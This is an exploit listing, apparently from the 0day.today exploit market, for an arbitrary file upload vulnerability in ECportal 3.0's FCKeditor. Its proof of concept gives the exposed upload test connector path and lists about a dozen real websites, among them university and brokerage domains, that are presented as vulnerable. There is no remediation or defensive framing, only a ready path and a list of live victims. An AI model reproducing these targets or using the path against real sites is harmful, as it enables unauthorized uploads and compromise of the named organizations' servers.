[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ECportal FCKeditor Arbitrary File Upload Vulnerability

Author
Hesam Bazvand
Risk
[
Security Risk High
]
0day-ID
0day-ID-24017
Category
web applications
Date add
10-08-2015
Platform
php
# Exploit Title: ECportal FCKeditor Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Homepage: http://turk-bh.ir
# Software Link: http://nomra.ir/
# Version: 3.0
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : Use Your Mind :D

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
POC :
	http://target.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

	http://aict.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.tpico.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.mech.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bahmantahlil.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://tsd-broker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.csri.ac.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://el.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.csri.ac.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bmibourse.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.mellatbroker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.saipayadak.org/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bahmanbroker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

#  0day.today [2024-12-24]  #